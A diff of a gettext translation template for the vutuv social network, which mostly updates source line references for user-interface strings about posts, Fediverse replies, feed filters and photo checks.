 #: lib/vutuv_web/controllers/settings_controller.ex:806
@@ -13324,7 +13324,7 @@ msgstr ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:259
 #: lib/vutuv_web/agent_docs/text.ex:221
-#: lib/vutuv_web/live/tag_live/timeline.ex:283
+#: lib/vutuv_web/live/tag_live/timeline.ex:284
 #, elixir-autogen, elixir-format
 msgid "Posts with this tag"
 msgstr ""
@@ -13534,34 +13534,34 @@ msgstr ""
 msgid "added %{count} new entries to their CV:"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6756
+#: lib/vutuv_web/components/post_components.ex:6759
 #, elixir-autogen, elixir-format
 msgid "Audiobook"
 msgstr ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1390
-#: lib/vutuv_web/components/post_components.ex:6713
+#: lib/vutuv_web/components/post_components.ex:6716
 #, elixir-autogen, elixir-format
 msgid "Book review"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6757
+#: lib/vutuv_web/components/post_components.ex:6760
 #, elixir-autogen, elixir-format
 msgid "Cinema"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6759
+#: lib/vutuv_web/components/post_components.ex:6762
 #, elixir-autogen, elixir-format
 msgid "DVD/Blu-ray"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6755
+#: lib/vutuv_web/components/post_components.ex:6758
 #, elixir-autogen, elixir-format
 msgid "E-book"
 msgstr ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1390
-#: lib/vutuv_web/components/post_components.ex:6712
+#: lib/vutuv_web/components/post_components.ex:6715
 #, elixir-autogen, elixir-format
 msgid "Film review"
 msgstr ""
@@ -13572,12 +13572,12 @@ msgstr ""
 msgid "Look up"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6754
+#: lib/vutuv_web/components/post_components.ex:6757
 #, elixir-autogen, elixir-format
 msgid "Printed book"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6758
+#: lib/vutuv_web/components/post_components.ex:6761
 #, elixir-autogen, elixir-format
 msgid "Streaming"
 msgstr ""
@@ -13597,7 +13597,7 @@ msgstr ""
 msgid "Year"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6795
+#: lib/vutuv_web/components/post_components.ex:6798
 #: lib/vutuv_web/views/job_reference_html.ex:180
 #, elixir-autogen, elixir-format
 msgid "%{formatted} page"
@@ -13605,30 +13605,30 @@ msgid_plural "%{formatted} pages"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/components/post_components.ex:6825
+#: lib/vutuv_web/components/post_components.ex:6828
 #: lib/vutuv_web/components/ui.ex:3884
 #, elixir-autogen, elixir-format
 msgid "%{hours} h"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6826
+#: lib/vutuv_web/components/post_components.ex:6829
 #: lib/vutuv_web/components/ui.ex:3885
 #, elixir-autogen, elixir-format
 msgid "%{hours} h %{minutes} min"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6824
+#: lib/vutuv_web/components/post_components.ex:6827
 #: lib/vutuv_web/components/ui.ex:3877
 #, elixir-autogen, elixir-format
 msgid "%{minutes} min"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6784
+#: lib/vutuv_web/components/post_components.ex:6787
 #, elixir-autogen, elixir-format
 msgid "(print edition)"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6831
+#: lib/vutuv_web/components/post_components.ex:6834
 #, elixir-autogen, elixir-format
 msgid "approx. %{duration}"
 msgstr ""
@@ -13658,7 +13658,7 @@ msgstr ""
 msgid "With qualification: %{name}"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6598
+#: lib/vutuv_web/components/post_components.ex:6601
 #, elixir-autogen, elixir-format
 msgid "Publisher:"
 msgstr ""
@@ -13701,7 +13701,7 @@ msgstr ""
 msgid "endorsed you for %{tags}."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6589
+#: lib/vutuv_web/components/post_components.ex:6592
 #, elixir-autogen, elixir-format
 msgid "by:"
 msgstr ""
@@ -14048,14 +14048,14 @@ msgstr ""
 msgid "See all frozen accounts"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4366
+#: lib/vutuv_web/components/post_components.ex:4369
 #, elixir-autogen, elixir-format
 msgid "Show %{formatted} earlier post"
 msgid_plural "Show %{formatted} earlier posts"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/components/post_components.ex:4389
+#: lib/vutuv_web/components/post_components.ex:4392
 #, elixir-autogen, elixir-format
 msgid "Show %{formatted} more reply"
 msgid_plural "Show %{formatted} more replies"
@@ -14082,7 +14082,7 @@ msgstr ""
 msgid "Type a name, @handle or email to find an account to freeze."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7312
+#: lib/vutuv_web/components/post_components.ex:7288
 #, elixir-autogen, elixir-format
 msgid "You can't like your own post."
 msgstr ""
@@ -14796,7 +14796,7 @@ msgstr ""
 msgid "ZIP or postal code"
 msgstr ""
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:387
+#: lib/vutuv_web/live/tag_live/timeline.ex:388
 #: lib/vutuv_web/templates/education/form_content.html.heex:59
 #: lib/vutuv_web/templates/work_experience/form_content.html.heex:81
 #, elixir-autogen, elixir-format
@@ -15227,7 +15227,7 @@ msgstr ""
 msgid "Your public posts are copied to other servers. Once a copy is there we cannot delete it, we cannot change it, and we cannot see where it travels next. Editing or deleting a post on vutuv is only a request to those servers, and not every server honours it."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7258
+#: lib/vutuv_web/components/post_components.ex:7234
 #: lib/vutuv_web/live/notification_live/index.ex:1592
 #, elixir-autogen, elixir-format, fuzzy
 msgid "%{formatted} reply"
@@ -15235,7 +15235,7 @@ msgid_plural "%{formatted} replies"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/components/post_components.ex:7262
+#: lib/vutuv_web/components/post_components.ex:7238
 #: lib/vutuv_web/live/notification_live/index.ex:1586
 #, elixir-autogen, elixir-format
 msgid "%{formatted} like"
@@ -15243,7 +15243,7 @@ msgid_plural "%{formatted} likes"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/components/post_components.ex:7266
+#: lib/vutuv_web/components/post_components.ex:7242
 #, elixir-autogen, elixir-format
 msgid "%{formatted} repost"
 msgid_plural "%{formatted} reposts"
@@ -15251,7 +15251,7 @@ msgstr[0] ""
 msgstr[1] ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1339
-#: lib/vutuv_web/components/post_components.ex:7217
+#: lib/vutuv_web/components/post_components.ex:7193
 #, elixir-autogen, elixir-format
 msgid "Already counted in the numbers above."
 msgstr ""
@@ -15349,8 +15349,8 @@ msgstr ""
 #: lib/vutuv_web/agent_docs/markdown.ex:1539
 #: lib/vutuv_web/components/post_components.ex:1503
 #: lib/vutuv_web/components/post_components.ex:1734
-#: lib/vutuv_web/components/post_components.ex:3607
-#: lib/vutuv_web/components/post_components.ex:3935
+#: lib/vutuv_web/components/post_components.ex:3611
+#: lib/vutuv_web/components/post_components.ex:3938
 #: lib/vutuv_web/templates/remote_actor_card/card.html.heex:366
 #, elixir-autogen, elixir-format
 msgid "View the original"
@@ -15793,7 +15793,7 @@ msgstr ""
 #: lib/vutuv_web/live/admin/activity_live.ex:237
 #: lib/vutuv_web/live/admin/media_live.ex:155
 #: lib/vutuv_web/live/fediverse_following_live.ex:351
-#: lib/vutuv_web/live/tag_live/timeline.ex:478
+#: lib/vutuv_web/live/tag_live/timeline.ex:479
 #, elixir-autogen, elixir-format
 msgid "Nothing matches that. Try a shorter search, or clear the filters."
 msgstr ""
@@ -16013,22 +16013,22 @@ msgstr ""
 msgid "device or detail"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4551
+#: lib/vutuv_web/components/post_components.ex:4554
 #, elixir-autogen, elixir-format
 msgid "Pinned post"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4685
+#: lib/vutuv_web/components/post_components.ex:4688
 #, elixir-autogen, elixir-format
 msgid "Pin to profile"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4693
+#: lib/vutuv_web/components/post_components.ex:4696
 #, elixir-autogen, elixir-format
 msgid "Unpin from profile"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4679
+#: lib/vutuv_web/components/post_components.ex:4682
 #, elixir-autogen, elixir-format
 msgid "Only one post can be pinned to your profile. Pin this one and release the other?"
 msgstr ""
@@ -16151,19 +16151,19 @@ msgstr ""
 msgid "No image description yet"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4130
+#: lib/vutuv_web/components/post_components.ex:4133
 #, elixir-autogen, elixir-format
 msgid "Open Fediverse settings"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:5634
-#: lib/vutuv_web/components/press_kit_components.ex:526
+#: lib/vutuv_web/components/post_components.ex:5637
+#: lib/vutuv_web/components/press_kit_components.ex:562
 #, elixir-autogen, elixir-format
 msgid "Photo %{n} of %{total}"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:5862
-#: lib/vutuv_web/components/press_kit_components.ex:623
+#: lib/vutuv_web/components/post_components.ex:5865
+#: lib/vutuv_web/components/press_kit_components.ex:660
 #, elixir-autogen, elixir-format
 msgid "Photo is being checked"
 msgstr ""
@@ -16176,7 +16176,7 @@ msgstr ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1500
 #: lib/vutuv_web/agent_docs/text.ex:909
-#: lib/vutuv_web/components/post_components.ex:5944
+#: lib/vutuv_web/components/post_components.ex:5947
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Photos:"
 msgstr ""
@@ -16202,7 +16202,7 @@ msgstr ""
 msgid "Show camera settings"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4183
+#: lib/vutuv_web/components/post_components.ex:4186
 #, elixir-autogen, elixir-format
 msgid "That server is blocked on this site, so no answer can be sent to it."
 msgstr ""
@@ -16222,7 +16222,7 @@ msgstr ""
 msgid "This photo carries the location it was taken at. Anyone who downloads the exact file can read it."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4174
+#: lib/vutuv_web/components/post_components.ex:4177
 #, elixir-autogen, elixir-format
 msgid "This reply was sent to you alone, so it cannot be answered publicly."
 msgstr ""
@@ -16232,12 +16232,12 @@ msgstr ""
 msgid "This reply was written on another network. Answering it means sending your words to that network, which vutuv only does for members who have switched Fediverse participation on."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4192
+#: lib/vutuv_web/components/post_components.ex:4195
 #, elixir-autogen, elixir-format
 msgid "This site does not take part in the Fediverse."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4126
+#: lib/vutuv_web/components/post_components.ex:4129
 #, elixir-autogen, elixir-format
 msgid "Turn on Fediverse participation to answer"
 msgstr ""
@@ -16252,7 +16252,7 @@ msgstr ""
 msgid "You have sent a lot of answers to other networks in the past hour. Please try again later."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4187
+#: lib/vutuv_web/components/post_components.ex:4190
 #, elixir-autogen, elixir-format
 msgid "You moved your Fediverse account to another server, so answers are no longer sent from here."
 msgstr ""
@@ -16262,7 +16262,7 @@ msgstr ""
 msgid "Your Fediverse settings do not allow sending an answer right now."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4140
+#: lib/vutuv_web/components/post_components.ex:4143
 #, elixir-autogen, elixir-format
 msgid "Your answer goes to %{handle} on their own server and to your Fediverse followers. It is a public post on vutuv as well."
 msgstr ""
@@ -16337,13 +16337,13 @@ msgstr[0] ""
 msgstr[1] ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1357
-#: lib/vutuv_web/components/post_components.ex:7255
+#: lib/vutuv_web/components/post_components.ex:7231
 #, elixir-autogen, elixir-format
 msgid "%{handle} liked this"
 msgstr ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1355
-#: lib/vutuv_web/components/post_components.ex:7252
+#: lib/vutuv_web/components/post_components.ex:7228
 #, elixir-autogen, elixir-format, fuzzy
 msgid "%{handle} shared this"
 msgstr ""
@@ -16353,7 +16353,7 @@ msgstr ""
 msgid "Fediverse reactions"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7139
+#: lib/vutuv_web/components/post_components.ex:7134
 #, elixir-autogen, elixir-format, fuzzy
 msgid "From other networks"
 msgstr ""
@@ -16705,7 +16705,7 @@ msgstr ""
 msgid "Thank you. Our copy was deleted right away."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:3934
+#: lib/vutuv_web/components/post_components.ex:3937
 #, elixir-autogen, elixir-format
 msgid "Vote on the original"
 msgstr ""
@@ -16730,7 +16730,7 @@ msgstr ""
 msgid "Hide"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:3875
+#: lib/vutuv_web/components/post_components.ex:3878
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Marked as sensitive by its author"
 msgstr ""
@@ -16860,12 +16860,12 @@ msgstr ""
 msgid "Sensitive. Show the picture."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4033
+#: lib/vutuv_web/components/post_components.ex:4036
 #, elixir-autogen, elixir-format
 msgid "That is a lot of likes in one hour. Please try again later."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4039
+#: lib/vutuv_web/components/post_components.ex:4042
 #, elixir-autogen, elixir-format, fuzzy
 msgid "That post is not here any more."
 msgstr ""
@@ -16875,7 +16875,7 @@ msgstr ""
 msgid "Back to the feed"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4178
+#: lib/vutuv_web/components/post_components.ex:4181
 #, elixir-autogen, elixir-format
 msgid "This post was published to that account's followers only, so it cannot be answered with a public post here."
 msgstr ""
@@ -17503,7 +17503,7 @@ msgstr ""
 msgid "View the conversation"
 msgstr ""
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:286
+#: lib/vutuv_web/live/tag_live/timeline.ex:287
 #: lib/vutuv_web/templates/post/index.html.heex:18
 #, elixir-autogen, elixir-format
 msgid "%{formatted} post"
@@ -17511,32 +17511,32 @@ msgid_plural "%{formatted} posts"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:455
+#: lib/vutuv_web/live/tag_live/timeline.ex:456
 #, elixir-autogen, elixir-format
 msgid "Most liked"
 msgstr ""
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:486
+#: lib/vutuv_web/live/tag_live/timeline.ex:487
 #, elixir-autogen, elixir-format
 msgid "No posts carry this tag yet."
 msgstr ""
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:484
+#: lib/vutuv_web/live/tag_live/timeline.ex:485
 #, elixir-autogen, elixir-format
 msgid "No posts from other networks carry this tag yet."
 msgstr ""
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:481
+#: lib/vutuv_web/live/tag_live/timeline.ex:482
 #, elixir-autogen, elixir-format
 msgid "No posts on vutuv carry this tag yet."
 msgstr ""
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:362
+#: lib/vutuv_web/live/tag_live/timeline.ex:363
 #, elixir-autogen, elixir-format
 msgid "word in a post"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4036
+#: lib/vutuv_web/components/post_components.ex:4039
 #, elixir-autogen, elixir-format
 msgid "That reply is not here any more."
 msgstr ""
@@ -17608,19 +17608,19 @@ msgstr ""
 msgid "Liked by"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6238
+#: lib/vutuv_web/components/post_components.ex:6241
 #, elixir-autogen, elixir-format
 msgid "Liked by %{name}"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6240
+#: lib/vutuv_web/components/post_components.ex:6243
 #, elixir-autogen, elixir-format
 msgid "Liked by %{name} and %{formatted} other"
 msgid_plural "Liked by %{name} and %{formatted} others"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/components/post_components.ex:6251
+#: lib/vutuv_web/components/post_components.ex:6254
 #, elixir-autogen, elixir-format
 msgid "Only you see everyone here: some of these members are not named to other readers."
 msgstr ""
@@ -17792,7 +17792,7 @@ msgstr ""
 msgid "Label"
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:3958
+#: lib/vutuv_web/live/post_live/feed.ex:3956
 #: lib/vutuv_web/live/reference_check_live.ex:169
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Loading…"
@@ -19203,7 +19203,7 @@ msgstr ""
 msgid "Start over"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4066
+#: lib/vutuv_web/components/post_components.ex:4069
 #, elixir-autogen, elixir-format
 msgid "A like or a repost is sent back to the network this post came from, and your account does not take part in the Fediverse at the moment. You can switch it on in the {settings}."
 msgstr ""
@@ -20071,27 +20071,27 @@ msgstr ""
 msgid "The language this post is written in"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6132
+#: lib/vutuv_web/components/post_components.ex:6135
 #, elixir-autogen, elixir-format
 msgid "Show the original"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6168
+#: lib/vutuv_web/components/post_components.ex:6171
 #, elixir-autogen, elixir-format
 msgid "Translate"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6177
+#: lib/vutuv_web/components/post_components.ex:6180
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Translated"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6180
+#: lib/vutuv_web/components/post_components.ex:6183
 #, elixir-autogen, elixir-format
 msgid "Translated from %{language}"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6157
+#: lib/vutuv_web/components/post_components.ex:6160
 #, elixir-autogen, elixir-format
 msgid "Translating…"
 msgstr ""
@@ -20101,7 +20101,7 @@ msgstr ""
 msgid "Feed language settings reset to the site defaults."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6147
+#: lib/vutuv_web/components/post_components.ex:6150
 #: lib/vutuv_web/components/ui.ex:5549
 #: lib/vutuv_web/live/feed_languages_live.ex:65
 #: lib/vutuv_web/live/feed_languages_live.ex:200
@@ -20230,20 +20230,20 @@ msgstr ""
 msgid "Your username, or paste the address of your profile page."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:5910
+#: lib/vutuv_web/components/post_components.ex:5913
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Our AI is still checking it. As soon as it is through, the photo appears by itself."
 msgid_plural "Our AI is still checking them, %{done} of %{total} done. As soon as the last one is through, the photos appear by themselves."
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/components/post_components.ex:5907
+#: lib/vutuv_web/components/post_components.ex:5910
 #, elixir-autogen, elixir-format
 msgid "Your post is published, the photo is not there yet."
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:2913
-#: lib/vutuv_web/components/post_components.ex:4976
+#: lib/vutuv_web/components/post_components.ex:4979
 #, elixir-autogen, elixir-format
 msgid "Our AI is looking at it. It appears here by itself once it is through."
 msgid_plural "Our AI is looking at them. They appear here by themselves once they are through."
@@ -20836,7 +20836,7 @@ msgstr ""
 msgid "email mail unsubscribe newsletter bell alert quiet fewer browser desktop popup push benachrichtigung"
 msgstr ""
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:341
+#: lib/vutuv_web/live/tag_live/timeline.ex:342
 #, elixir-autogen, elixir-format
 msgid "%{formatted} active"
 msgstr ""
@@ -20881,7 +20881,7 @@ msgstr ""
 msgid "Follow #%{tag} from Mastodon or any other Fediverse app and its public posts arrive in your timeline. No vutuv account needed."
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:4128
+#: lib/vutuv_web/live/post_live/feed.ex:4126
 #, elixir-autogen, elixir-format
 msgid "Greet other members"
 msgstr ""
@@ -21354,13 +21354,13 @@ msgid "Hide a word or a whole phrase …"
 msgstr "Hide a word or a whole phrase …"
 
 #: lib/vutuv_web/live/post_live/feed.ex:854
-#: lib/vutuv_web/live/post_live/feed.ex:4291
+#: lib/vutuv_web/live/post_live/feed.ex:4289
 #, elixir-autogen, elixir-format
 msgid "Hide tags"
 msgstr "Hide tags"
 
 #: lib/vutuv_web/live/post_live/feed.ex:853
-#: lib/vutuv_web/live/post_live/feed.ex:4280
+#: lib/vutuv_web/live/post_live/feed.ex:4278
 #, elixir-autogen, elixir-format
 msgid "Hide words"
 msgstr "Hide words"
@@ -21427,7 +21427,7 @@ msgstr "Posts carrying one of these tags are folded the same way."
 msgid "Posts containing one of these are folded to a single line — not deleted, and with a way to open them anyway."
 msgstr "Posts containing one of these are folded to a single line — not deleted, and with a way to open them anyway."
 
-#: lib/vutuv_web/live/post_live/feed.ex:4154
+#: lib/vutuv_web/live/post_live/feed.ex:4152
 #, elixir-autogen, elixir-format
 msgid "Put away:"
 msgstr ""
@@ -21466,7 +21466,7 @@ msgid "Show posts by %{name}"
 msgstr ""
 
 #: lib/vutuv_web/live/post_live/feed.ex:852
-#: lib/vutuv_web/live/post_live/feed.ex:4246
+#: lib/vutuv_web/live/post_live/feed.ex:4244
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Sources"
 msgstr ""
@@ -21505,8 +21505,8 @@ msgid_plural "and %{formatted} more"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:3711
-#: lib/vutuv_web/live/post_live/feed.ex:3738
+#: lib/vutuv_web/live/post_live/feed.ex:3709
+#: lib/vutuv_web/live/post_live/feed.ex:3736
 #, elixir-autogen, elixir-format, fuzzy
 msgctxt "feed filter sheet"
 msgid "Filter"
@@ -21536,7 +21536,7 @@ msgid "Your organization page was updated. The new logo is being checked and app
 msgstr ""
 
 #: lib/vutuv_web/live/organization_live/edit.ex:290
-#: lib/vutuv_web/live/press_kit_live.ex:1225
+#: lib/vutuv_web/live/press_kit_live.ex:1250
 #: lib/vutuv_web/templates/user/edit.html.heex:22
 #, elixir-autogen, elixir-format
 msgid "%{formats}, up to %{limit}"
@@ -21568,7 +21568,7 @@ msgid_plural "%{count} posts on %{day}"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:3915
+#: lib/vutuv_web/live/post_live/feed.ex:3913
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Back to now"
 msgstr ""
@@ -21578,7 +21578,7 @@ msgstr ""
 msgid "Busy month: the shading counts at least this much."
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:3961
+#: lib/vutuv_web/live/post_live/feed.ex:3959
 #, elixir-autogen, elixir-format
 msgid "Load the whole day (%{formatted} post)"
 msgid_plural "Load the whole day (%{formatted} posts)"
@@ -21600,7 +21600,7 @@ msgstr ""
 msgid "Next year"
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:3911
+#: lib/vutuv_web/live/post_live/feed.ex:3909
 #, elixir-autogen, elixir-format
 msgid "Nothing reached your feed on %{day}."
 msgstr ""
@@ -21694,7 +21694,7 @@ msgid_plural "New (%{formatted}):"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/components/post_components.ex:3802
+#: lib/vutuv_web/components/post_components.ex:3805
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Quoted post"
 msgstr ""
@@ -21750,7 +21750,7 @@ msgstr ""
 msgid "only %{account}"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7600
+#: lib/vutuv_web/components/post_components.ex:7576
 #: lib/vutuv_web/live/post_live/filter_band.ex:290
 #: lib/vutuv_web/live/post_live/filter_band.ex:379
 #, elixir-autogen, elixir-format
@@ -21934,7 +21934,7 @@ msgctxt "phone tab bar"
 msgid "Write"
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:4049
+#: lib/vutuv_web/live/post_live/feed.ex:4047
 #: lib/vutuv_web/live/post_rewrites_live.ex:287
 #, elixir-autogen, elixir-format, fuzzy
 msgid "%{formatted} rule"
@@ -22004,7 +22004,7 @@ msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:1457
 #: lib/vutuv_web/components/post_components.ex:3407
-#: lib/vutuv_web/components/post_components.ex:4766
+#: lib/vutuv_web/components/post_components.ex:4769
 #: lib/vutuv_web/components/ui.ex:5541
 #: lib/vutuv_web/live/post_rewrites_live.ex:76
 #: lib/vutuv_web/live/post_rewrites_live.ex:262
@@ -22235,7 +22235,7 @@ msgstr[1] ""
 msgid "Last 30 days: %{parts}"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:5328
+#: lib/vutuv_web/components/post_components.ex:5331
 #: lib/vutuv_web/live/notification_live/index.ex:1003
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Less"
@@ -22550,7 +22550,7 @@ msgid "Hidden. What they pass on stays out of your feed; their own posts do not.
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:3379
-#: lib/vutuv_web/components/post_components.ex:4760
+#: lib/vutuv_web/components/post_components.ex:4763
 #, elixir-autogen, elixir-format
 msgid "Hide reposts"
 msgstr ""
@@ -22731,8 +22731,8 @@ msgstr ""
 msgid "Posts loaded at once"
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:3985
-#: lib/vutuv_web/live/post_live/feed.ex:3989
+#: lib/vutuv_web/live/post_live/feed.ex:3983
+#: lib/vutuv_web/live/post_live/feed.ex:3987
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Posts per page"
 msgstr ""
@@ -22747,60 +22747,60 @@ msgstr ""
 msgid "feed length page size posts number amount load more scroll paging seite länge anzahl beiträge nachladen mehr laden umfang"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7591
-#: lib/vutuv_web/components/post_components.ex:7592
+#: lib/vutuv_web/components/post_components.ex:7567
+#: lib/vutuv_web/components/post_components.ex:7568
 #, elixir-autogen, elixir-format, fuzzy
 msgid "A word or phrase …"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7619
+#: lib/vutuv_web/components/post_components.ex:7595
 #, elixir-autogen, elixir-format
 msgid "For whom %{thing} is hidden"
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:4046
-#: lib/vutuv_web/live/post_live/feed.ex:4210
-#: lib/vutuv_web/live/post_live/feed.ex:4219
+#: lib/vutuv_web/live/post_live/feed.ex:4044
+#: lib/vutuv_web/live/post_live/feed.ex:4208
+#: lib/vutuv_web/live/post_live/feed.ex:4217
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Hidden"
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:4184
+#: lib/vutuv_web/live/post_live/feed.ex:4182
 #, elixir-autogen, elixir-format
 msgid "Hide something from your feed"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7537
+#: lib/vutuv_web/components/post_components.ex:7513
 #, elixir-autogen, elixir-format
 msgid "Stop showing"
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:4225
+#: lib/vutuv_web/live/post_live/feed.ex:4223
 #, elixir-autogen, elixir-format
 msgid "Whatever these match is folded to a single line in your feed."
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:4245
+#: lib/vutuv_web/live/post_live/feed.ex:4243
 #, elixir-autogen, elixir-format
 msgid "Words & tags"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7623
+#: lib/vutuv_web/components/post_components.ex:7599
 #, elixir-autogen, elixir-format, fuzzy
 msgid "everyone"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7626
+#: lib/vutuv_web/components/post_components.ex:7602
 #, elixir-autogen, elixir-format, fuzzy
 msgid "only %{handle}"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7595
+#: lib/vutuv_web/components/post_components.ex:7571
 #, elixir-autogen, elixir-format, fuzzy
 msgid "this word"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7636
+#: lib/vutuv_web/components/post_components.ex:7612
 #, elixir-autogen, elixir-format
 msgid "only %{server}"
 msgstr "only %{server}"
@@ -22852,7 +22852,7 @@ msgstr ""
 msgid "The site itself is running, this address just is not one of ours. The link is probably old, or it carries a typo."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6941
+#: lib/vutuv_web/components/post_components.ex:6944
 #, elixir-autogen, elixir-format
 msgid "Show this screenshot larger"
 msgstr ""
@@ -22943,7 +22943,7 @@ msgid "Hidden. What other people pass on of them stays out of your feed; their o
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:3365
-#: lib/vutuv_web/components/post_components.ex:4748
+#: lib/vutuv_web/components/post_components.ex:4751
 #, elixir-autogen, elixir-format
 msgid "Hide when others repost them"
 msgstr ""
@@ -23658,13 +23658,13 @@ msgstr ""
 msgid "“%{note}”"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:5506
+#: lib/vutuv_web/components/post_components.ex:5509
 #: lib/vutuv_web/components/press_kit_components.ex:216
 #, elixir-autogen, elixir-format
 msgid "Show these photos larger"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:5692
+#: lib/vutuv_web/components/post_components.ex:5695
 #, elixir-autogen, elixir-format
 msgid "Show this photo larger"
 msgstr ""
@@ -23683,48 +23683,48 @@ msgid_plural "%{formatted} more entries (%{years})"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1299
+#: lib/vutuv_web/live/press_kit_live.ex:1324
 #, elixir-autogen, elixir-format
 msgid "%{percent}%"
 msgstr ""
 
